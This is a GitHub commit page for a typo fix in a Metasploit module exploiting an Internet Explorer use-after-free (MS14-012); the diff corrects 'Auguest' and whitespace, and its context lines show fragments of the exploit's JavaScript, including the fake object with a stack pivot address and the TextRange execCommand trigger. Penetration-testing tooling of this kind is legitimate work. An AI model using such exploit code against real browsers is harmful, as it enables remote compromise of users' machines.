Skip to content

Commit 8cb7bc3

Browse files
committed
Fix typo
1 parent c5158a3 commit 8cb7bc3

File tree

1 file changed

+3
-3
lines changed

1 file changed

+3
-3
lines changed

modules/exploits/windows/browser/ms14_012_textrange.rb

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -17,7 +17,7 @@ def initialize(info={})
1717
This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw
1818
was most likely introduced back in 2013, therefore only certain builds of MSHTML are
1919
affected. In our testing with IE9, these vulnerable builds appear to be between
20-
9.0.8112.16496 and 9.0.8112.16533, which implies Auguest 2013 until early March 2014
20+
9.0.8112.16496 and 9.0.8112.16533, which implies August 2013 until early March 2014
2121
(before the patch).
2222
},
2323
'License' => MSF_LICENSE,
@@ -106,7 +106,7 @@ def exploit_html
106106
hxds();
107107
var fake = "";
108108
for (var i = 0; i < 12; i++) {
109-
if (i==0) {
109+
if (i==0) {
110110
fake += unescape("<%=Rex::Text.to_unescape([target['Pivot']].pack('V*'))%>");
111111
}
112112
else {
@@ -123,7 +123,7 @@ def exploit_html
123123
var element = document.createElement(elements[i]);
124124
document.body.appendChild(element);
125125
}
126-
126+
127127
var tRange = document.body.createTextRange();
128128
tRange.moveToElementText(document.body.children[16]);
129129
tRange.execCommand('InsertInputSubmit', true, null);

0 commit comments

Comments
 (0)